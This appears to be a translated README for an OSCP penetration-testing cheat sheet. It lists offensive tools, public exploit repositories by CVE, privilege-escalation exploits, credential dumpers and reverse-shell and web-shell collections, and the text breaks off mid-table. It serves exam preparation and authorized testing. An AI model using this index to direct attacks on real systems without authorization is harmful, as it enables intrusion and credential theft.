0xsyr0/OSCP

GitHub: 0xsyr0/OSCP

针对 OSCP 考试与渗透测试的综合实战速查表。

Stars: 3692 | Forks: 759

# OSCP 速查表 ![GitHub stars](https://img.shields.io/github/stars/0xsyr0/OSCP?logoColor=yellow) ![GitHub forks](https://img.shields.io/github/forks/0xsyr0/OSCP?logoColor=purple) ![GitHub watchers](https://img.shields.io/github/watchers/0xsyr0/OSCP?logoColor=green)
![GitHub commit activity (branch)](https://img.shields.io/github/commit-activity/m/0xsyr0/OSCP) ![GitHub contributors](https://img.shields.io/github/contributors/0xsyr0/OSCP) 由于这个小项目受到了越来越多的关注,我决定尽可能频繁地更新它,以专注于对考试更有帮助且绝对必要的命令。随着 OffSec 发布了有效期仅为 `3 年` 的 `OffSec Certified Professional Plus` 或 `OSCP+` 认证,我现在将添加更多高级技术,例如 `Active Directory Certificate Services (AD CS) Abuse` 和 `Shadow Credentials Attacks`,以覆盖尽可能多的课程内容。 如果您有任何建议,欢迎提交 pull request 或在 [X](https://twitter.com/syr0_) 上联系我——或者最好是 [Bluesky](https://bsky.app/profile/0xsyr0.bsky.social)。非常感谢您的贡献! 以下是 [OSCP Exam Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide#exam-restrictions) 和关于 [LinPEAS](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/?hss_channel=tw-134994790) 的讨论链接。希望这对您有帮助。 此外,还有两个您在参加考试前应该查看的重要资源。 - [https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offsec.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide) - [https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams](https://help.offsec.com/hc/en-us/sections/360008126631-Proctored-Exams) 感谢您的阅读。
## 目录 - [基础](#basics) - [信息收集](#information-gathering) - [漏洞分析](#vulnerability-analysis) - [Web 应用分析](#web-application-analysis) - [数据库评估](#database-assessment) - [密码攻击](#password-attacks) - [漏洞利用工具](#exploitation-tools) - [后渗透](#post-exploitation) - [漏洞利用数据库](#exploit-databases) - [CVEs](#cves) - [Payloads](#payloads) - [字典](#wordlists) - [报告](#reporting) - [社交媒体资源](#social-media-resources) - [命令](#commands) - [基础](#basics-1) - [curl](#curl) - [文件传输](#file-transfer) - [FTP](#ftp) - [Kerberos](#kerberos) - [Linux](#linux) - [Microsoft Windows](#microsoft-windows) - [NFS](#nfs) - [PHP Webserver](#php-webserver) - [Ping](#ping) - [端口转发](#port-forwarding-1) - [Python Webserver](#python-webserver) - [RDP](#rdp) - [showmount](#showmount) - [SMB](#smb) - [smbclient](#smbclient) - [SSH](#ssh) - [时间和日期](#time-and-date) - [Tmux](#tmux) - [升级 Shell](#upgrading-shells) - [uv](#uv) - [VirtualBox](#virtualbox) - [virtualenv](#virtualenv) - [信息收集](#information-gathering-1) - [memcached](#memcached) - [NetBIOS](#netbios) - [Nmap](#nmap) - [端口扫描](#port-scanning) - [snmpwalk](#snmpwalk) - [Web 应用分析](#web-application-analysis-1) - [Burp Suite](#burp-suite) - [cadaver](#cadaver) - [跨站脚本攻击 (XSS)](#cross-site-scripting-xss) - [ffuf](#ffuf) - [Gobuster](#gobuster) - [GitTools](#gittools) - [本地文件包含 (LFI)](#local-file-inclusion-lfi) - [PDF PHP Inclusion](#pdf-php-inclusion) - [PHP 上传过滤器绕过](#php-upload-filter-bypasses) - [PHP 过滤器链生成器](#php-filter-chain-generator) - [PHP 通用 Gadget 链 (PHPGGC)](#php-generic-gadget-chains-phpggc) - [服务端请求伪造 (SSRF)](#server-side-request-forgery-ssrf) - [服务端模板注入 (SSTI)](#server-side-template-injection-ssti) - [上传漏洞](#upload-vulnerabilities) - [wfuzz](#wfuzz) - [WPScan](#wpscan) - [XML 外部实体 (XXE)](#xml-external-entity-xxe) - [数据库分析](#database-analysis) - [impacket-mssqlclient](#impacket-mssqlclient) - [MongoDB](#mongodb) - [MSSQL](#mssql) - [MySQL](#mysql) - [NoSQL 注入](#nosql-injection) - [PostgreSQL](#postgresql) - [Redis](#redis) - [SQL 注入](#sql-injection) - [SQL 截断攻击](#sql-truncation-attack) - [sqlite3](#sqlite3) - [sqsh](#sqsh) - [密码攻击](#password-attacks-1) - [DonPAPI](#donpapi) - [fcrack](#fcrack) - [组策略首选项 (GPP)](#group-policy-preferences-gpp) - [hashcat](#hashcat) - [Hydra](#hydra) - [John the Ripper](#john-the-ripper) - [Kerbrute](#kerbrute) - [LaZagne](#lazagne) - [mimikatz](#mimikatz) - [NetExec](#netexec) - [pypykatz](#pypykatz) - [Spray-Passwords](#spray-passwords) - [漏洞利用工具](#exploitation-tools-1) - [Metasploit](#metasploit) - [后渗透](#post-exploitation-1) - [Account Operators 组成员身份](#account-operators-group-membership) - [Active Directory](#active-directory) - [Active Directory Certificate Services (AD CS)](#active-directory-certificate-services-ad-cs) - [ADCSTemplate](#adcstemplate) - [ADMiner](#adminer) - [BloodHound](#bloodhound) - [Bloodhound-Legacy](#bloodhound-legacy) - [BloodHound Python](#bloodhound-python) - [bloodyAD](#bloodyAD) - [Certify](#certify) - [Certipy](#certipy) - [enum4linux-ng](#enum4linux-ng) - [Evil-WinRM](#evil-winrm) - [Impacket](#impacket-1) - [JAWS](#jaws) - [Kerberos](#kerberos-1) - [ldapsearch](#ldapsearch) - [Linux](#linux-1) - [Microsoft Windows](#microsoft-windows-1) - [NTLM](#ntlm) - [PassTheCert](#passthecert) - [Penelope](#penelope) - [PKINITtools](#pkinittools) - [端口扫描](#port-scanning-1) - [powercat](#powercat) - [Powermad](#powermad) - [PowerShell](#powershell) - [PrivescCheck](#privesccheck) - [pwncat](#pwncat) - [rpcclient](#rpcclient) - [Rubeus](#rubeus) - [RunasCs](#runascs) - [Seatbelt](#seatbelt) - [Shadow Credentials](#shadow-credentials) - [smbpasswd](#smbpasswd) - [Titanis](#titanis) - [winexe](#winexe) - [社会工程学工具](#social-engineering-tools) - [Microsoft Office Word 钓鱼宏](#microsoft-office-word-phishing-macro) - [Microsoft Windows 库文件](#microsoft-windows-library-files) - [CVE](#cve) - [CVE-2014-6271: Shellshock RCE PoC](#cve-2014-6271-shellshock-rce-poc) - [CVE-2016-1531: exim LPE](#cve-2016-1531-exim-lpe) - [CVE-2019-14287: Sudo 绕过](#cve-2019-14287-sudo-bypass) - [CVE-2020-1472: ZeroLogon PE](#cve-2020-1472-zerologon-pe) - [CVE-2021–3156: Sudo / sudoedit LPE](#cve-2021-3156-sudo--sudoedit-lpe) - [CVE-2021-42287: NoPac LPE](#cve-2021-42287-nopac-lpe) - [CVE-2021-44228: Log4Shell RCE (0-day)](#cve-2021-44228-log4shell-rce-0-day) - [CVE-2022-0847: Dirty Pipe LPE](#cve-2022-0847-dirty-pipe-lpe) - [CVE-2022-22963: Spring4Shell RCE (0-day)](#cve-2022-22963-spring4shell-rce-0-day) - [CVE-2022-31214: Firejail LPE](#cve-2022-31214-firejail-lpe) - [CVE-2023-21746: Windows NTLM EoP LocalPotato LPE](#cve-2023-21746-windows-ntlm-eop-localpotato-lpe) - [CVE-2023-22809: Sudo 绕过](#cve-2023-22809-sudo-bypass) - [CVE-2023-32629, CVE-2023-2640: GameOverlay Ubuntu Kernel Exploit LPE (0-day)](#cve-2023-32629-cve-2023-2640-gameoverlay-ubuntu-kernel-exploit-lpe-0-day) - [CVE-2023-4911: Looney Tunables LPE](#cve-2023-4911-looney-tunables-lpe) - [CVE-2023-7028: GitLab 账户接管](#cve-2023-7028-gitlab-account-takeover) - [CVE-2024-4577: PHP-CGI 参数注入漏洞 RCE](#cve-2024-4577-php-cgi-argument-injection-vulnerability-rce) - [CVE-2025-29927: Next.js 认证绕过](#cve-2025-29927-nextjs-authentication-bypass) - [CVE-2025-32463: chwoot sudo LPE](#cve-2025-32463-chwoot-sudo-lpe) - [CVE-2025-55182: React2Shell RCE](#cve-2025-55182-react2shell-rce) - [CVE-2026-24061: GNU Inetutils telnetd RCE](#cve-2026-24061-gnu-inetutils-telnetd-rce) - [BadSuccessor 委托托管服务帐户 (dMSA) LPE](#badsuccessor-delegated-managed-service-account-dmsa-lpe) - [GodPotato LPE](#godpotato-lpe) - [Juicy Potato LPE](#juicy-potato-lpe) - [JuicyPotatoNG LPE](#juicypotatong-lpe) - [MySQL 4.x/5.0 用户自定义函数 (UDF) 动态库 (2) LPE](#mysql-4x50-user-defined-function-udf-dynamic-library-2-lpe) - [PrintSpoofer LPE](#printspoofer-lpe) - [SharpEfsPotato LPE](#sharpefspotato-lpe) - [Shocker 容器逃逸](#shocker-container-escape) - [Payloads](#payloads-1) - [Exiftool](#exiftool) - [反向 Shell](#reverse-shells) - [Web Shell](#web-shells) - [模板](#templates) - [ASPX Web Shell](#aspx-web-shell) - [Bad YAML](#bad-yaml) - [字典](#wordlists-1) - [Bash](#bash) - [CeWL](#cewl) - [CUPP](#cupp) - [crunch](#crunch) - [JavaScript 快速字典](#javascript-quick-wordlist) - [Username Anarchy](#username-anarchy) ### 基础 | 名称 | URL | | --- | --- | | Chisel | https://github.com/jpillora/chisel | | CyberChef | https://gchq.github.io/CyberChef | | Ligolo-ng | https://github.com/nicocha30/ligolo-ng | | Swaks | https://github.com/jetmore/swaks | ### 信息收集 | 名称 | URL | | --- | --- | | Nmap | https://github.com/nmap/nmap | ### 漏洞分析 | 名称 | URL | | --- | --- | | nikto | https://github/sullo/nikto | | Sparta | https://github.com/SECFORCE/sparta | ### Web 应用分析 | 名称 | URL | | --- | --- | | ffuf | https://github.com/ffuf/ffuf | | fpmvuln | https://github.com/hannob/fpmvuln | | Gobuster | https://github.com/OJ/gobuster | | JSON Web Tokens | https://jwt.io | | JWT_Tool | https://github.com/ticarpi/jwt_tool | | JWTLens | https://jwtlens.netlify.app | | Leaky Paths | https://github.com/ayoubfathi/leaky-paths | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | PHP Filter Chain Generator | https://github.com/synacktiv/php_filter_chain_generator | | PHPGGC | https://github.com/ambionics/phpggc | | Spose | https://github.com/aancw/spose | | Wfuzz | https://github.com/xmendez/wfuzz | | WhatWeb | https://github.com/urbanadventurer/WhatWeb | | WPScan | https://github.com/wpscanteam/wpscan | ### 数据库评估 | 名称 | URL | | --- | --- | | RedisModules-ExecuteCommand | https://github.com/n0b0dyCN/RedisModules-ExecuteCommand | | Redis RCE | https://github.com/Ridter/redis-rce | | Redis Rogue Server | https://github.com/n0b0dyCN/redis-rogue-server | | SQL Injection Cheatsheet | https://tib3rius.com/sqli.html | ### 密码攻击 | 名称 | URL | | --- | --- | | Default Credentials Cheat Sheet | https://github.com/ihebski/DefaultCreds-cheat-sheet | | Firefox Decrypt | https://github.com/unode/firefox_decrypt | | hashcat | https://hashcat.net/hashcat | | Hydra | https://github.com/vanhauser-thc/thc-hydra | | John the Ripper | https://github.com/openwall/john | | keepass-dump-masterkey | https://github.com/CMEPW/keepass-dump-masterkey | | KeePwn | https://github.com/Orange-Cyberdefense/KeePwn | | Kerbrute | https://github.com/ropnop/kerbrute | | LaZagne | https://github.com/AlessandroZ/LaZagne | | mimikatz | https://github.com/gentilkiwi/mimikatz | | NetExec | https://github.com/Pennyw0rth/NetExec | | ntlm.pw | https://ntlm.pw | | pypykatz | https://github.com/skelsec/pypykatz | ### 漏洞利用工具 | 名称 | URL | | --- | --- | | Evil-WinRM | https://github.com/Hackplayers/evil-winrm | | Metasploit | https://github.com/rapid7/metasploit-framework | ### 后渗透 | 名称 | URL | | --- | --- | | ADCSKiller - An ADCS Exploitation Automation Tool | https://github.com/grimlockx/ADCSKiller | | ADCSTemplate | https://github.com/GoateePFE/ADCSTemplate | | ADMiner | https://github.com/Mazars-Tech/AD_Miner | | adPEAS | https://github.com/ajm4n/adPEAS | | BloodHound Docker | https://github.com/belane/docker-bloodhound | | BloodHound | https://github.com/SpecterOps/BloodHound | | BloodHound-Legacy | https://github.com/SpecterOps/BloodHound-Legacy | | BloodHound | https://github.com/ly4k/BloodHound | | BloodHound-Legacy Collectors | https://github.com/SpecterOps/BloodHound-Legacy/tree/master/Collectors | | BloodHound Python | https://github.com/dirkjanm/BloodHound.py | | bloodhound-quickwin | https://github.com/kaluche/bloodhound-quickwin | | bloodyAD | https://github.com/CravateRouge/bloodyAD | | Cable | https://github.com/logangoins/Cable | | Certify | https://github.com/GhostPack/Certify | | Certipy | https://github.com/ly4k/Certipy | | certipy-merged | https://github.com/zimedev/certipy-merged | | Cheat Sheet - Attack Active Directory | https://github.com/drak3hft7/Cheat-Sheet---Active-Directory | | DonPAPI | https://github.com/login-securite/DonPAPI | | enum4linux-ng | https://github.com/cddmp/enum4linux-ng | | Ghostpack-CompiledBinaries | https://github.com/r3motecontrol/Ghostpack-CompiledBinaries | | GTFOBins | https://gtfobins.github.io | | Impacket | https://github.com/fortra/impacket | | Impacket Static Binaries | https://github.com/ropnop/impacket_static_binaries | | JAWS | https://github.com/411Hall/JAWS | | KrbRelay | https://github.com/cube0x0/KrbRelay | | KrbRelayUp | https://github.com/Dec0ne/KrbRelayUp | | Krbrelayx | https://github.com/dirkjanm/krbrelayx | | LAPSDumper | https://github.com/n00py/LAPSDumper | | LES | https://github.com/The-Z-Labs/linux-exploit-suggester | | LinEnum | https://github.com/rebootuser/LinEnum | | lsassy | https://github.com/Hackndo/lsassy | | Moriaty | https://github.com/BC-SECURITY/Moriarty | | nanodump | https://github.com/fortra/nanodump | | Outpacket | https://github.com/n00py/Outpacket | | PassTheCert | https://github.com/AlmondOffSec/PassTheCert | | PEASS-ng | https://github.com/carlospolop/PEASS-ng | | Penelope | https://github.com/brightio/penelope | | PKINITtools | https://github.com/dirkjanm/PKINITtools | | powercat | https://github.com/besimorhino/powercat | | PowerSharpPack | https://github.com/S3cur3Th1sSh1t/PowerSharpPack | | PowerUp | https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 | | PowerView | https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 | | PowerView.py | https://github.com/aniqfakhrul/powerview.py | | PPLdump | https://github.com/itm4n/PPLdump | | Priv2Admin | https://github.com/gtworek/Priv2Admin | | PrivescCheck | https://github.com/itm4n/PrivescCheck | | PSPKIAudit | https://github.com/GhostPack/PSPKIAudit | | pspy | https://github.com/DominicBreuker/pspy | | pth-toolkit | https://github.com/byt3bl33d3r/pth-toolkit | | pwncat | https://github.com/calebstewart/pwncat | | pypykatz | https://github.com/skelsec/pypykatz | | pyWhisker | https://github.com/ShutdownRepo/pywhisker | | Rubeus | https://github.com/GhostPack/Rubeus | | RunasCs | https://github.com/antonioCoco/RunasCs | | RustHound | https://github.com/OPENCYBER-FR/RustHound | | scavenger | https://github.com/SpiderLabs/scavenger | | SharpADWS | https://github.com/wh0amitz/SharpADWS | | SharpCollection | https://github.com/Flangvik/SharpCollection | | SharpChromium | https://github.com/djhohnstein/SharpChromium | | SharpHound | https://github.com/SpecterOps/SharpHound | | SharpSuccessor | https://github.com/logangoins/SharpSuccessor | | SharpView | https://github.com/tevora-threat/SharpView | | Sherlock | https://github.com/rasta-mouse/Sherlock | | Titanis | https://github.com/trustedsec/Titanis | | WADComs | https://wadcoms.github.io | | Watson | https://github.com/rasta-mouse/Watson | | WESNG | https://github.com/bitsadmin/wesng | | Whisker | https://github.com/eladshamir/Whisker | | Windows-privesc-check | https://github.com/pentestmonkey/windows-privesc-check | | Windows Privilege Escalation Fundamentals | https://www.fuzzysecurity.com/tutorials/16.html | | Windows Privilege Escalation | https://github.com/frizb/Windows-Privilege-Escalation | ### 漏洞利用数据库 | 数据库 | URL | | --- | --- | | 0day.today Exploit Database | https://0day.today | | Exploit Database | https://www.exploit-db.com | | Packet Storm | https://packetstormsecurity.com | | Sploitus | https://sploitus.com | ### CVEs | CVE | 描述 | URL | | --- | --- | --- | | CVE-2014-6271 | Shocker RCE | https://github.com/nccgroup/shocker | | CVE-2014-6271 | Shellshock RCE PoC | https://github.com/zalalov/CVE-2014-6271 | | CVE-2014-6271 | Shellshocker RCE POCs | https://github.com/mubix/shellshocker-pocs | | CVE-2016-5195 | Dirty COW LPE | https://github.com/firefart/dirtycow | | CVE-2016-5195 | Dirty COW '/proc/self/mem' 竞争条件 (/etc/passwd 方法) LPE | https://www.exploit-db.com/exploits/40847 | | CVE-2016-5195 | Dirty COW 'PTRACE_POKEDATA' 竞争条件 (/etc/passwd 方法) LPE | https://www.exploit-db.com/exploits/40839 | | CVE-2017-0144 | EternalBlue (MS17-010) RCE | https://github.com/d4t4s3c/Win7Blue | | CVE-2017-0199 | RTF Dynamite RCE | https://github.com/bhdresh/CVE-2017-0199 | | CVE-2018-7600 | Drupalgeddon 2 RCE | https://github.com/g0rx/CVE-2018-7600-Drupal-RCE | | CVE-2018-10933 | libSSH 认证绕过 | https://github.com/blacknbunny/CVE-2018-10933 | | CVE-2018-16509 | Ghostscript PIL RCE | https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509 | | CVE-2019-14287 | Sudo 绕过 LPE | https://github.com/n0w4n/CVE-2019-14287 | | CVE-2019-18634 | Sudo 缓冲区溢出 LPE | https://github.com/saleemrashid/sudo-cve-2019-18634 | | CVE-2019-5736 | RunC 容器逃逸 PoC | https://github.com/Frichetten/CVE-2019-5736-PoC | | CVE-2019-6447 | ES File Explorer 开放端口任意文件读取 | https://github.com/fs0c131y/ESFileExplorerOpenPortVuln | | CVE-2019-7304 | dirty_sock LPE | https://github.com/initstring/dirty_sock | | CVE-2020-0796 | SMBGhost RCE PoC | https://github.com/chompie1337/SMBGhost_RCE_PoC | | CVE-2020-1472 | ZeroLogon PE 检查器和漏洞利用代码 | https://github.com/VoidSec/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE 漏洞利用脚本 | https://github.com/risksense/zerologon | | CVE-2020-1472 | ZeroLogon PE PoC | https://github.com/dirkjanm/CVE-2020-1472 | | CVE-2020-1472 | ZeroLogon PE 测试脚本 | https://github.com/SecuraBV/CVE-2020-1472 | | CVE-2021-1675,CVE-2021-34527 | PrintNightmare LPE RCE | https://github.com/nemo-wq/PrintNightmare-CVE-2021-327 | | CVE-2021-1675 | PrintNightmare LPE RCE (PowerShell 实现) | https://github.com/calebstewart/CVE-2021-1675 | | CVE-2021-21972 | vCenter RCE | https://github.com/horizon3ai/CVE-2021-21972 | | CVE-2021-22204 | ExifTool 命令注入 RCE | https://github.com/AssassinUKG/CVE-2021-22204 | | CVE-2021-22204 | GitLab ExifTool RCE | https://github.com/CsEnox/Gitlab-Exiftool-RCE | | CVE-2021-22204 | GitLab ExifTool RCE (Python 实现) | https://github.com/convisolabs/CVE-2021-22204-exiftool | | CVE-2021-26085 | Confluence Server RCE | https://github.com/Phuong39/CVE-2021-26085 | | CVE-2021-27928 | MariaDB/MySQL wsrep provider RCE | https://github.com/Al1ex/CVE-2021-27928 | | CVE-2021-3129 | Laravel Framework RCE | https://github.com/nth347/CVE-2021-3129_exploit | | CVE-2021-3156 | Sudo / sudoedit LPE | https://github.com/mohinparamasivam/Sudo-1.8.31-Root-Exploit | | CVE-2021-3156 | Sudo / sudoedit LPE PoC | https://github.com/blasty/CVE-2021-3156 | | CVE-2021-3493 | OverlayFS Ubuntu Kernel Exploit LPE | https://github.com/briskets/CVE-2021-3493 | | CVE-2021-3560 | polkit LPE (C 实现) | https://github.com/hakivvi/CVE-2021-3560 | | CVE-2021-3560 | polkit LPE | https://github.com/Almorabea/Polkit-exploit | | CVE-2021-3560 | polkit LPE PoC | https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation | | CVE-2021-36934 | HiveNightmare LPE | https://github.com/GossiTheDog/HiveNightmare | | CVE-2021-36942 | PetitPotam | https://github.com/topotam/PetitPotam | | CVE-2021-36942 | DFSCoerce | https://github.com/Wh04m1001/DFSCoerce | | CVE-2021-4034 | PwnKit Pkexec 自包含漏洞利用 LPE | https://github.com/ly4k/PwnKit | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (1) | https://github.com/dzonerzy/poc-cve-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (2) | https://github.com/arthepsy/CVE-2021-4034 | | CVE-2021-4034 | PwnKit Pkexec LPE PoC (3) | https://github.com/nikaiw/CVE-2021-4034 | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (存档) | https://github.com/klinix5/InstallerFileTakeOver | | CVE-2021-41379 | InstallerFileTakeOver LPE (0-day) (分支) | https://github.com/waltlin/CVE-2021-41379-With-Public-Exploit-Lets-You-Become-An-Admin-InstallerFileTakeOver | | CVE-2021-41773,CVE-2021-42013, CVE-2020-17519 | 简单 Apache 路径遍历 (0-day) | https://github.com/MrCl0wnLab/SimplesApachePathTraversal | | CVE-2021-42278,CVE-2021-42287 | sam-the-admin, sAMAccountName 欺骗 / 域管理员模拟 PE | https://github.com/WazeHell/sam-the-admin | | CVE-2021-42278 | sam-the-admin, sAMAccountName 欺骗 / 域管理员模拟 PE (Python 实现) | https://github.com/ly4k/Pachine | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (1) | https://github.com/cube0x0/noPac | | CVE-2021-42287,CVE-2021-42278 | noPac LPE (2) | https://github.com/Ridter/noPac | | CVE-2021-42321 | Microsoft Exchange Server RCE | https://gist.github.com/testanull/0188c1ae847f37a70fe536123d14f398 | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/kozmer/log4j-shell-poc | | CVE-2021-44228 | Log4Shell RCE (0-day) | https://github.com/welk1n/JNDI-Injection-Exploit | | CVE-2022-0847 | DirtyPipe-Exploit LPE | https://github.com/n3rada/DirtyPipe | | CVE-2022-0847 | DirtyPipe-Exploits LPE | https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits | | CVE-2022-21999 | SpoolFool, Windows Print Spooler LPE | https://github.com/ly4k/SpoolFool | | CVE-2022-22963 | Spring4Shell RCE (0-day) | https://github.com/tweedge/springcore-0day-en | | CVE-2022-23119,CVE-2022-23120 | Trend Micro Deep Security Agent for Linux 任意文件读取 | https://github.com/modzero/MZ-21-02-Trendmicro | | CVE-2022-24715 | Icinga Web 2 已认证远程代码执行 RCE | https://github.com/JacobEbben/CVE-2022-24715 | | CVE-2022-26134 | ConfluentPwn RCE (0-day) | https://github.com/redhuntlabs/ConfluentPwn | | CVE-2022-31214 | Firejail / Firejoin LPE | https://seclists.org/oss-sec/2022/q2/188 | | CVE-2022-31214 | Firejail / Firejoin LPE | https://www.openwall.com/lists/oss-security/2022/06/08/10 | | CVE-2022-34918 | Netfilter Kernel Exploit LPE | https://github.com/randorisec/CVE-2022-34918-LPE-PoC | | CVE-2022-46169 | Cacti 认证绕过 RCE | https://github.com/ariyaadinatha/cacti-cve-2022-46169-exploit | | CVE-2023-20598 | PDFWKRNL 内核驱动 LPE | https://github.com/H4rk3nz0/CVE-2023-20598-PDFWKRNL | | CVE-2023-21746 | Windows NTLM EoP LocalPotato LPE | https://github.com/decoder-it/LocalPotato | | CVE-2023-21768 | Windows Ancillary Function Driver for WinSock LPE POC | https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768 | | CVE-2023-21817 | Kerberos Unlock LPE PoC | https://gist.github.com/monoxgas/f615514fb51ebb55a7229f3cf79cf95b | | CVE-2023-22809 | sudoedit LPE | https://github.com/n3m1dotsys/CVE-2023-22809-sudoedit-privesc | | CVE-2023-23752 | Joomla 未认证信息泄露 | https://github.com/Acceis/exploit-CVE-2023-23752 | | CVE-2023-25690 | Apache mod_proxy HTTP 请求走私 PoC | https://github.com/dhmosfunk/CVE-2023-25690-POC | | CVE-2023-28879 | Shell in the Ghost: Ghostscript RCE PoC | https://github.com/AlmondOffSec/PoCs/tree/master/Ghostscript_rce | | CVE-2023-32233 | Netfilter nf_tables 中的释放后重用 LPE | https://github.com/Liuk3r/CVE-2023-32233 | | CVE-2023-32629, CVE-2023-2640 | GameOverlay Ubuntu Kernel Exploit LPE (0-day) | https://twitter.com/liadeliyahu/status/1684841527959273472?s=09 | | CVE-2023-36874 | Windows Error Reporting Service LPE (0-day) | https://github.com/Wh04m1001/CVE-2023-36874 | | CVE-2023-51467, CVE-2023-49070 | Apache OFBiz 认证绕过 | https://github.com/jakabakos/Apache-OFBiz-Authentication-Bypass | | CVE-2023-7028 | GitLab 账户接管 | https://github.com/V1lu0/CVE-2023-7028 | | CVE-2023-7028 | GitLab 账户接管 | https://github.com/Vozec/CVE-2023-7028 | | CVE-2024-0582 | Ubuntu Linux Kernel io_uring LPE | https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 | | CVE-2024-1086 | Linux Kernel Netfilter nf_tables 中的释放后重用 LPE | https://github.com/Notselwyn/CVE-2024-1086 | | CVE-2024-4577 | PHP-CGI 参数注入漏洞 RCE | https://github.com/watchtowrlabs/CVE-2024-4577 | | CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 | | CVE-2024-49138 | Windows Common Log File System Driver LPE | https://github.com/MrAle98/CVE-2024-49138-POC | | CVE-2025-14847 | MongoBleed MongoDB 未认证内存泄露漏洞利用 RCE | https://github.com/joe-desimone/mongobleed | | CVE-2025-24071 | Windows File Explorer 欺骗漏洞 (1) | https://github.com/ThemeHackers/CVE-2025-24071 | | CVE-2025-24071 | Windows File Explorer 欺骗漏洞 (2) | https://github.com/0x6rss/CVE-2025-24071_PoC | | CVE-2025-24813 | Apache Tomcat 反序列化 RCE (1) | https://github.com/iSee857/CVE-2025-24813-PoC | | CVE-2025-24813 | Apache Tomcat 反序列化 RCE (2) | https://github.com/absholi7ly/POC-CVE-2025-24813 | | CVE-2025-29927 | Next.js 认证绕过 | https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware | | CVE-2025-30397 | Windows Server 2025 JScript.dll 中的释放后重用 (RCE) | https://github.com/mbanyamer/CVE-2025-30397---Windows-Server-2025-JScript-RCE-Use-After-Free- | | CVE-2025-32463 | chwoot sudo LPE | https://github.com/pr0v3rbs/CVE-2025-32463_chwoot | | CVE-2025-55182 | React2Shell RCE | https://github.com/msanft/CVE-2025-55182 | | CVE-2025-62215 | Windows Kernel LPE | https://github.com/dexterm300/CVE-2025-62215-exploit-poc | | CVE-2025-9074 | Docker Desktop (Windows) 容器逃逸 - 通过暴露的 Engine API 进行主机写入 | https://github.com/zenzue/CVE-2025-9074 | | CVE-2026-24061 | GNU Inetutils telnet RCE | https://github.com/SafeBreach-Labs/CVE-2026-24061 | | n/a | BadSuccessor LPE | https://github.com/ibaiC/BadSuccessor | | n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce | | n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce | | n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc | | n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato | | n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato | | n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato | | n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato | | n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato | | n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato | | n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato | | n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG | | n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato | | n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 | | n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato | | n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG | | n/a | RustPotato LPE | https://github.com/safedv/RustPotato | | n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato | | n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato | | n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato | | n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato | | n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato | | n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer | | n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer | | n/a | SharpSuccessor LPE | https://github.com/logangoins/SharpSuccessor | | n/a | Shocker 容器逃逸 | https://github.com/gabrtv/shocker | | n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare | | n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter | | n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM | | n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 | | n/a | bin-sploits | https://gitlab.com/exploit-database/exploitdb-bin-sploits | | n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub | | n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits | | n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits | ### Payloads | 名称 | URL | | --- | --- | | Payload Box | https://github.com/payloadbox | | PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings | | phpgcc | https://github.com/ambionics/phpggc | | PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell| | webshell | https://github.com/tennc/webshell | | Web-Shells | https://github.com/TheBinitGhimire/Web-Shells | ### 字典 | 名称 | URL | | --- | --- | | bopscrk | https://github.com/R3nt0n/bopscrk | | CeWL | https://github.com/digininja/cewl | | COOK | https://github.com/giteshnxtlvl/cook | | CUPP | https://github.com/Mebus/cupp | | Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists | | SecLists | https://github.com/danielmiessler/SecLists | | Username 